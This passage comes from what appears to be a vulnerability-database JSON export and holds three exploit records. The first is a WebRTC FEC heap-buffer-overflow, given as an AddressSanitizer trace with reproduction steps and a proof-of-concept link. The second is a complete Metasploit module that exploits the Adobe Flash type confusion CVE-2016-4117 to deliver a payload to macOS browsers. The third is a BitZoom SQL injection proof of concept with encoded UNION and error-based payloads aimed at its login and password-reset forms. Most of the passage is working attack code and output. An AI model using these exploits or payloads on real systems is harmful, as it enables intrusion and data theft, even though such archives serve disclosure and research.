base::sequence_manager::internal::ThreadControllerImpl::DoWork(base::sequence_manager::internal::ThreadControllerImpl::WorkType) third_party/blink/renderer/platform/scheduler/base/thread_controller_impl.cc:166:21\r\n #55 0x55e00d52b6f5 in Run base/callback.h:96:12\r\n #56 0x55e00d52b6f5 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:101\r\n #57 0x55e00d5881d5 in base::MessageLoop::RunTask(base::PendingTask*) base/message_loop/message_loop.cc:319:25\r\n #58 0x55e00d589444 in DeferOrRunPendingTask base/message_loop/message_loop.cc:329:5\r\n #59 0x55e00d589444 in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:373\r\n #60 0x55e00d591acf in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:37:31\r\n #61 0x55e00d600551 in base::RunLoop::Run() base/run_loop.cc:102:14\r\n #62 0x55e01bfb0599 in content::RendererMain(content::MainFunctionParams const&) content/renderer/renderer_main.cc:218:23\r\n #63 0x55e00cafbca5 in content::RunZygote(content::ContentMainDelegate*) content/app/content_main_runner_impl.cc:567:14\r\n #64 0x55e00caff751 in content::ContentMainRunnerImpl::Run() content/app/content_main_runner_impl.cc:969:10\r\n #65 0x55e00cb1e6c3 in service_manager::Main(service_manager::MainParams const&) services/service_manager/embedder/main.cc:459:29\r\n #66 0x55e00cafa2d0 in content::ContentMain(content::ContentMainParams const&) content/app/content_main.cc:19:10\r\n #67 0x55e006081fe3 in ChromeMain chrome/app/chrome_main.cc:101:12\r\n #68 0x7fa3ceac32b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)\r\n\r\nSUMMARY: AddressSanitizer: heap-buffer-overflow third_party/webrtc/modules/rtp_rtcp/source/forward_error_correction.cc:615:34 in XorPayloads\r\nShadow bytes around the buggy address:\r\n 0x0c3680767f90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c3680767fa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c3680767fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c3680767fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c3680767fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x0c3680767fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[fa]fa\r\n 0x0c3680767ff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c3680768000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c3680768010: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x0c3680768020: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x0c3680768030: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n Shadow gap: cc\r\n==109993==ABORTING\r\n\r\nTo reproduce this issue:\r\n\r\n1) Apply new.patch to a fresh WebRTC tree\r\n2) Build video_replay\r\n3) Download the attached files and run ./video_replay --input_file fec\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45444.zip", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45444/"}], "zdt": [{"lastseen": "2019-02-25T06:40:39", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a type confusion on Adobe Flash Player, which was originally found being successfully exploited in the wild. This module has been tested successfully on: macOS Sierra 10.12.3, Safari and Adobe Flash Player 21.0.0.182, Firefox and Adobe Flash Player 21.0.0.182.", "modified": "2019-02-09T00:00:00", "published": "2019-02-09T00:00:00", "id": "1337DAY-ID-32146", "href": "https://0day.today/exploit/description/32146", "title": "Adobe Flash Player DeleteRangeTimelineOperation Type Confusion Exploit", "type": "zdt", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion',\r\n 'Description' => %q(\r\n This module exploits a type confusion on Adobe Flash Player, which was\r\n originally found being successfully exploited in the wild. This module\r\n has been tested successfully on:\r\n macOS Sierra 10.12.3,\r\n Safari and Adobe Flash Player 21.0.0.182,\r\n Firefox and Adobe Flash Player 21.0.0.182.\r\n ),\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Genwei Jiang', # FireEye original blog details on the vulnerability\r\n 'bcook-r7' # Imported Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2016-4117'],\r\n ['BID', '90505'],\r\n ['URL', 'https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html'],\r\n ['URL', 'http://www.securitytracker.com/id/1035826'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa16-02.html'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb16-15.html'],\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => ['osx'],\r\n 'BrowserRequirements' =>\r\n {\r\n source: /script|headers/i,\r\n os_name: lambda do |os|\r\n os =~ OperatingSystems::Match::MAC_OSX\r\n end,\r\n ua_name: lambda do |ua|\r\n case target.name\r\n when 'Mac OS X'\r\n return true if ua == Msf::HttpClients::SAFARI\r\n return true if ua == Msf::HttpClients::FF\r\n end\r\n\r\n false\r\n end,\r\n flash: lambda do |ver|\r\n case target.name\r\n when 'Mac OS X'\r\n return true if Gem::Version.new(ver) <= Gem::Version.new('21.0.0.182')\r\n end\r\n\r\n false\r\n end\r\n },\r\n 'Targets' =>\r\n [\r\n [\r\n 'Mac OS X', {\r\n 'Platform' => 'osx',\r\n 'Arch' => ARCH_X64\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Apr 27 2016',\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n\r\n super\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Request: #{request.uri}\")\r\n\r\n if request.uri.end_with? 'swf'\r\n print_status('Sending SWF...')\r\n send_response(cli, @swf, 'Content-Type' => 'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache')\r\n return\r\n end\r\n\r\n print_status('Sending HTML...')\r\n send_exploit_html(cli, exploit_template(cli, target_info), 'Pragma' => 'no-cache')\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n swf_random = \"#{rand_text_alpha(3..7)}.swf\"\r\n target_payload = get_payload(cli, target_info)\r\n b64_payload = Rex::Text.encode_base64(target_payload)\r\n\r\n if target.name.include? 'osx'\r\n platform_id = 'osx'\r\n end\r\n html_template = %(<html>\r\n <body>\r\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\r\n <param name=\"movie\" value=\"<%=swf_random%>\" />\r\n <param name=\"allowScriptAccess\" value=\"always\" />\r\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" />\r\n <param name=\"Play\" value=\"true\" />\r\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" Play=\"true\"/>\r\n </object>\r\n </body>\r\n </html>\r\n )\r\n\r\n return html_template, binding\r\n end\r\n\r\n def create_swf\r\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-4117', 'msf.swf')\r\n File.binread(path)\r\n end\r\nend\n\n# 0day.today [2019-02-25] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/32146"}, {"lastseen": "2018-11-19T19:13:19", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2018-11-16T00:00:00", "published": "2018-11-16T00:00:00", "id": "1337DAY-ID-31638", "href": "https://0day.today/exploit/description/31638", "title": "BitZoom 1.0 - rollno SQL Injection Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: BitZoom 1.0 - 'rollno' SQL Injection\r\n# Exploit Author: Ihsan Sencan\r\n# Vendor Homepage: https://bitzoom.sourceforge.io/\r\n# Software Link: https://excellmedia.dl.sourceforge.net/project/bitzoom/bitzoom-master.zip\r\n# Version: 1.0\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: N/A\r\n \r\n# POC: \r\n# 1) \r\n# http://localhost/[PATH]/forgot.php\r\n# \r\nPOST /PATH/forgot.php HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: PHPSESSID=rsq0813q4hl4dtbfesogugiln3\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 572\r\nrollno=%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:[email\u00a0protected]_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%[email\u00a0protected]:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:[email\u00a0protected]%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2d%2d%20%2d\r\nHTTP/1.1 200 OK\r\nDate: Wed, 14 Nov 2018 11:17:49 GMT\r\nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30\r\nX-Powered-By: PHP/5.6.30\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nContent-Length: 2488\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/html; charset=UTF-8\r\n \r\n# POC: \r\n# 2) \r\n# http://localhost/[PATH]/forgot.php\r\n# \r\nPOST /PATH/forgot.php HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: PHPSESSID=rsq0813q4hl4dtbfesogugiln3\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 574\r\nusername=%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:[email\u00a0protected]_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%[email\u00a0protected]:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:[email\u00a0protected]%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2d%2d%20%2d\r\nHTTP/1.1 200 OK\r\nDate: Wed, 14 Nov 2018 11:17:52 GMT\r\nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30\r\nX-Powered-By: PHP/5.6.30\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nContent-Length: 2486\r\nKeep-Alive: timeout=5, max=99\r\nConnection: Keep-Alive\r\nContent-Type: text/html; charset=UTF-8\r\n \r\n# POC: \r\n# 3) \r\n# http://localhost/[PATH]/login.php\r\n# \r\nPOST /PATH/login.php HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 592\r\nusername=%31%32%27%7c%28%53%65%6c%65%43%54%20%27%45%66%65%27%20%46%72%6f%4d%20%64%75%41%4c%20%57%68%65%52%45%20%31%31%30%3d%31%31%30%20%41%6e%44%20%28%73%65%4c%45%63%54%20%31%31%32%20%66%72%4f%4d%28%53%45%6c%65%63%54%20%43%6f%75%4e%54%28%2a%29%2c%43%6f%6e%43%41%54%28%44%41%54%41%42%41%53%45%28%29%2c%28%53%65%4c%45%63%74%20%28%45%4c%54%28%31%31%32%3d%31%31%32%2c%31%29%29%29%2c%46%4c%6f%6f%52%28%52%41%6e%64%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%72%6d%61%74%49%4f%4e%5f%53%63%68%45%4d%41%2e%50%6c%75%47%49%4e%53%20%67%72%4f%55%70%20%42%59%20%78%29%61%29%29%7c%27&password=Efe\r\nHTTP/1.1 200 OK\r\nDate: Wed, 14 Nov 2018 11:03:08 GMT\r\nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30\r\nX-Powered-By: PHP/5.6.30\r\nContent-Length: 585\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/html; charset=UTF-8\n\n# 0day.today [2018-11-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31638"}, {"lastseen": "2018-09-22T13:48:28", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2018-09-22T00:00:00", "published": "2018-09-22T00:00:00", "id": "1337DAY-ID-31144", "href": "https://0day.today/exploit/description/31144", "title": "WebRTC - FEC Out-of-Bounds Read Exploit", "type": "zdt", "sourceData": "There is an out-of-bounds read in FEC processing in WebRTC. If a very short RTP packet is received, FEC will assume the packet is longer and process data outside of the allocated buffer.\r\n \r\nThis bug causes the following ASAN crash:\r\n \r\n==109993==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b003b7ff70 at pc 0x55e01a250cd1 bp 0x7fa3af7abc40 sp 0x7fa3af7abc38\r\nREAD of size 1 at 0x61b003b7ff70 thread T15 (Chrome_libJingl)\r\n #0 0x55e01a250cd0 in XorPayloads third_party/webrtc/modules/rtp_rtcp/source/forward_error_correction.cc:615:34\r\n #1 0x55e01a250cd0 in webrtc::ForwardErrorCorrection::RecoverPacket(webrtc::ForwardErrorCorrection::ReceivedFecPacket const&, webrtc::ForwardErrorCorrection::RecoveredPacket*) third_party/webrtc/modules/rtp_rtcp/source/forward_error_correction.cc:630\r\n #2 0x55e01a251162 in webrtc::ForwardErrorCorrection::AttemptRecovery(std::__1::list<std::__1::unique_ptr<webrtc::ForwardErrorCorrection::RecoveredPacket, std::__1::default_delete<webrtc::ForwardErrorCorrection::RecoveredPacket> >, std::__1::allocator<std::__1::unique_ptr<webrtc::ForwardErrorCorrection::RecoveredPacket, std::__1::default_delete<webrtc::ForwardErrorCorrection::RecoveredPacket> > > >*) third_party/webrtc/modules/rtp_rtcp/source/forward_error_correction.cc:652:12\r\n #3 0x55e01a251b12 in webrtc::ForwardErrorCorrection::DecodeFec(webrtc::ForwardErrorCorrection::ReceivedPacket const&, std::__1::list<std::__1::unique_ptr<webrtc::ForwardErrorCorrection::RecoveredPacket, std::__1::default_delete<webrtc::ForwardErrorCorrection::RecoveredPacket> >, std::__1::allocator<std::__1::unique_ptr<webrtc::ForwardErrorCorrection::RecoveredPacket, std::__1::default_delete<webrtc::ForwardErrorCorrection::RecoveredPacket> > > >*) third_party/webrtc/modules/rtp_rtcp/source/forward_error_correction.cc:739:3\r\n #4 0x55e01a4c5595 in webrtc::UlpfecReceiverImpl::ProcessReceivedFec() third_party/webrtc/modules/rtp_rtcp/source/ulpfec_receiver_impl.cc:248:11\r\n #5 0x55e01a4a1bb9 in webrtc::RtpVideoStreamReceiver::ParseAndHandleEncapsulatingHeader(unsigned char const*, unsigned long, webrtc::RTPHeader const&) third_party/webrtc/video/rtp_video_stream_receiver.cc:419:23\r\n #6 0x55e01a49f05b in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) third_party/webrtc/video/rtp_video_stream_receiver.cc:390:5\r\n #7 0x55e01a49fcf2 in webrtc::RtpVideoStreamReceiver::OnRtpPacket(webrtc::RtpPacketReceived const&) third_party/webrtc/video/rtp_video_stream_receiver.cc:290:3\r\n #8 0x55e009a368a1 in webrtc::RtpDemuxer::OnRtpPacket(webrtc::RtpPacketReceived const&) third_party/webrtc/call/rtp_demuxer.cc:157:11\r\n #9 0x55e009a3b6e1 in webrtc::RtpStreamReceiverController::OnRtpPacket(webrtc::RtpPacketReceived const&) third_party/webrtc/call/rtp_stream_receiver_controller.cc:55:19\r\n #10 0x55e01a231339 in webrtc::internal::Call::DeliverRtp(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) third_party/webrtc/call/call.cc:1321:36\r\n #11 0x55e01a232300 in webrtc::internal::Call::DeliverPacket(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) third_party/webrtc/call/call.cc:1361:10\r\n #12 0x55e01a95d341 in cricket::WebRtcVideoChannel::OnPacketReceived(rtc::CopyOnWriteBuffer*, rtc::PacketTime const&) third_party/webrtc/media/engine/webrtcvideoengine.cc:1441:26\r\n #13 0x55e01a1d8dc2 in cricket::BaseChannel::ProcessPacket(bool, rtc::CopyOnWriteBuffer const&, rtc::PacketTime const&) third_party/webrtc/pc/channel.cc\r\n #14 0x55e01a1f6760 in rtc::AsyncInvoker::OnMessage(rtc::Message*) third_party/webrtc/rtc_base/asyncinvoker.cc:45:22\r\n #15 0x55e01a0a6aa1 in jingle_glue::JingleThreadWrapper::Dispatch(rtc::Message*) jingle/glue/thread_wrapper.cc:157:22\r\n #16 0x55e01a0a7d7e in jingle_glue::JingleThreadWrapper::RunTask(int) jingle/glue/thread_wrapper.cc:279:7\r\n #17 0x55e00d52b6f5 in Run base/callback.h:96:12\r\n #18 0x55e00d52b6f5 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:101\r\n #19 0x55e00d5881d5 in base::MessageLoop::RunTask(base::PendingTask*) base/message_loop/message_loop.cc:319:25\r\n #20 0x55e00d589444 in DeferOrRunPendingTask base/message_loop/message_loop.cc:329:5\r\n #21 0x55e00d589444 in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:373\r\n #22 0x55e00d591acf in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:37:31\r\n #23 0x55e00d600551 in base::RunLoop::Run() base/run_loop.cc:102:14\r\n #24 0x55e00d6878b4 in base::Thread::ThreadMain() base/threading/thread.cc:337:3\r\n #25 0x55e00d73c694 in base::(anonymous namespace)::ThreadFunc(void*) base/threading/platform_thread_posix.cc:76:13\r\n #26 0x7fa3d586f493 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x7493)\r\n \r\n0x61b003b7ff70 is located 0 bytes to the right of 1520-byte region [0x61b003b7f980,0x61b003b7ff70)\r\nallocated by thread T15 (Chrome_libJingl) here:\r\n #0 0x55e00607ef92 in operator new(unsigned long) /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/asan_new_delete.cc:93:3\r\n #1 0x55e01a4c3eeb in webrtc::UlpfecReceiverImpl::AddReceivedRedPacket(webrtc::RTPHeader const&, unsigned char const*, unsigned long, unsigned char) third_party/webrtc/modules/rtp_rtcp/source/ulpfec_receiver_impl.cc:101:26\r\n #2 0x55e01a4a1b6f in webrtc::RtpVideoStreamReceiver::ParseAndHandleEncapsulatingHeader(unsigned char const*, unsigned long, webrtc::RTPHeader const&) third_party/webrtc/video/rtp_video_stream_receiver.cc:414:27\r\n #3 0x55e01a49f05b in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) third_party/webrtc/video/rtp_video_stream_receiver.cc:390:5\r\n #4 0x55e01a49fcf2 in webrtc::RtpVideoStreamReceiver::OnRtpPacket(webrtc::RtpPacketReceived const&) third_party/webrtc/video/rtp_video_stream_receiver.cc:290:3\r\n #5 0x55e009a368a1 in webrtc::RtpDemuxer::OnRtpPacket(webrtc::RtpPacketReceived const&) third_party/webrtc/call/rtp_demuxer.cc:157:11\r\n #6 0x55e009a3b6e1 in webrtc::RtpStreamReceiverController::OnRtpPacket(webrtc::RtpPacketReceived const&) third_party/webrtc/call/rtp_stream_receiver_controller.cc:55:19\r\n #7 0x55e01a231339 in webrtc::internal::Call::DeliverRtp(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) third_party/webrtc/call/call.cc:1321:36\r\n #8 0x55e01a232300 in webrtc::internal::Call::DeliverPacket(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) third_party/webrtc/call/call.cc:1361:10\r\n #9 0x55e01a95d341 in cricket::WebRtcVideoChannel::OnPacketReceived(rtc::CopyOnWriteBuffer*, rtc::PacketTime const&) third_party/webrtc/media/engine/webrtcvideoengine.cc:1441:26\r\n #10 0x55e01a1d8dc2 in cricket::BaseChannel::ProcessPacket(bool, rtc::CopyOnWriteBuffer const&, rtc::PacketTime const&) third_party/webrtc/pc/channel.cc\r\n #11 0x55e01a1f6760 in rtc::AsyncInvoker::OnMessage(rtc::Message*) third_party/webrtc/rtc_base/asyncinvoker.cc:45:22\r\n #12 0x55e01a0a6aa1 in jingle_glue::JingleThreadWrapper::Dispatch(rtc::Message*) jingle/glue/thread_wrapper.cc:157:22\r\n #13 0x55e01a0a7d7e in jingle_glue::JingleThreadWrapper::RunTask(int) jingle/glue/thread_wrapper.cc:279:7\r\n #14 0x55e00d52b6f5 in Run base/callback.h:96:12\r\n #15 0x55e00d52b6f5 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:101\r\n #16 0x55e00d5881d5 in base::MessageLoop::RunTask(base::PendingTask*) base/message_loop/message_loop.cc:319:25\r\n #17 0x55e00d589444 in DeferOrRunPendingTask base/message_loop/message_loop.cc:329:5\r\n #18 0x55e00d589444 in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:373\r\n #19 0x55e00d591acf in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:37:31\r\n #20 0x55e00d600551 in base::RunLoop::Run() base/run_loop.cc:102:14\r\n #21 0x55e00d6878b4 in base::Thread::ThreadMain() base/threading/thread.cc:337:3\r\n #22 0x55e00d73c694 in base::(anonymous namespace)::ThreadFunc(void*) base/threading/platform_thread_posix.cc:76:13\r\n #23 0x7fa3d586f493 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x7493)\r\n \r\nThread T15 (Chrome_libJingl) created by T0 (chrome) here:\r\n #0 0x55e00603bb7d in __interceptor_pthread_create /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/asan_interceptors.cc:210:3\r\n #1 0x55e00d73b99e in base::(anonymous namespace)::CreateThread(unsigned long, bool, base::PlatformThread::Delegate*, base::PlatformThreadHandle*, base::ThreadPriority) base/threading/platform_thread_posix.cc:115:13\r\n #2 0x55e00d686be9 in base::Thread::StartWithOptions(base::Thread::Options const&) base/threading/thread.cc:112:15\r\n #3 0x55e00d68684b in base::Thread::Start() base/threading/thread.cc:75:10\r\n #4 0x55e01a09ba37 in content::PeerConnectionDependencyFactory::CreatePeerConnectionFactory() content/renderer/media/webrtc/peer_connection_dependency_factory.cc:177:3\r\n #5 0x55e01a09b4d0 in content::PeerConnectionDependencyFactory::GetPcFactory() content/renderer/media/webrtc/peer_connection_dependency_factory.cc:139:5\r\n #6 0x55e01a09df09 in content::PeerConnectionDependencyFactory::CreatePeerConnection(webrtc::PeerConnectionInterface::RTCConfiguration const&, blink::WebLocalFrame*, webrtc::PeerConnectionObserver*) content/renderer/media/webrtc/peer_connection_dependency_factory.cc:340:8\r\n #7 0x55e01aa63b1b in content::RTCPeerConnectionHandler::Initialize(blink::WebRTCConfiguration const&, blink::WebMediaConstraints const&) content/renderer/media/webrtc/rtc_peer_connection_handler.cc:1333:50\r\n #8 0x55e01baafde2 in blink::RTCPeerConnection::RTCPeerConnection(blink::ExecutionContext*, blink::WebRTCConfiguration const&, blink::WebMediaConstraints, blink::ExceptionState&) third_party/blink/renderer/modules/peerconnection/rtc_peer_connection.cc:585:23\r\n #9 0x55e01baaaedc in blink::RTCPeerConnection::Create(blink::ExecutionContext*, blink::RTCConfiguration const&, blink::Dictionary const&, blink::ExceptionState&) third_party/blink/renderer/modules/peerconnection/rtc_peer_connection.cc:518:44\r\n #10 0x55e01bb1ad0b in constructor gen/third_party/blink/renderer/bindings/modules/v8/v8_rtc_peer_connection.cc:1317:29\r\n #11 0x55e01bb1ad0b in blink::V8RTCPeerConnection::constructorCallback(v8::FunctionCallbackInfo<v8::Value> const&) gen/third_party/blink/renderer/bindings/modules/v8/v8_rtc_peer_connection.cc:1667\r\n #12 0x55e00ab4db49 in v8::internal::FunctionCallbackArguments::Call(v8::internal::CallHandlerInfo*) v8/src/api-arguments-inl.h:94:3\r\n #13 0x55e00ab4a4c4 in v8::internal::MaybeHandle<v8::internal::Object> v8::internal::(anonymous namespace)::HandleApiCallHelper<true>(v8::internal::Isolate*, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::FunctionTemplateInfo>, v8::internal::Handle<v8::internal::Object>, v8::internal::BuiltinArguments) v8/src/builtins/builtins-api.cc:109:36\r\n #14 0x55e00ab48eb3 in v8::internal::Builtin_Impl_HandleApiCall(v8::internal::BuiltinArguments, v8::internal::Isolate*) v8/src/builtins/builtins-api.cc:135:5\r\n #15 0x55e00c2fce0d (/usr/local/google/home/natashenka/chromium3/src/out/asan/chrome+0xde74e0d)\r\n #16 0x55e00c263d3f (/usr/local/google/home/natashenka/chromium3/src/out/asan/chrome+0xdddbd3f)\r\n #17 0x7e9c7b70dd69 (<unknown module>)\r\n #18 0x7e9c7b68868f (<unknown module>)\r\n #19 0x55e00c2618a5 (/usr/local/google/home/natashenka/chromium3/src/out/asan/chrome+0xddd98a5)\r\n #20 0x55e00c263c60 (/usr/local/google/home/natashenka/chromium3/src/out/asan/chrome+0xdddbc60)\r\n #21 0x7e9c7b70dd69 (<unknown module>)\r\n #22 0x7e9c7b68868f (<unknown module>)\r\n #23 0x7e9c7b68868f (<unknown module>)\r\n #24 0x7e9c7b68868f (<unknown module>)\r\n #25 0x55e00c2618a5 (/usr/local/google/home/natashenka/chromium3/src/out/asan/chrome+0xddd98a5)\r\n #26 0x55e00c265722 (/usr/local/google/home/natashenka/chromium3/src/out/asan/chrome+0xdddd722)\r\n #27 0x7e9c7b684820 (<unknown module>)\r\n #28 0x55e00b3b4130 in Call v8/src/simulator.h:113:12\r\n #29 0x55e00b3b4130 in v8::internal::(anonymous namespace)::Invoke(v8::internal::Isolate*, bool, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, v8::internal::Handle<v8::internal::Object>, v8::internal::Execution::MessageHandling, v8::internal::Execution::Target) v8/src/execution.cc:155\r\n #30 0x55e00b3b3993 in CallInternal v8/src/execution.cc:191:10\r\n #31 0x55e00b3b3993 in v8::internal::Execution::Call(v8::internal::Isolate*, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, 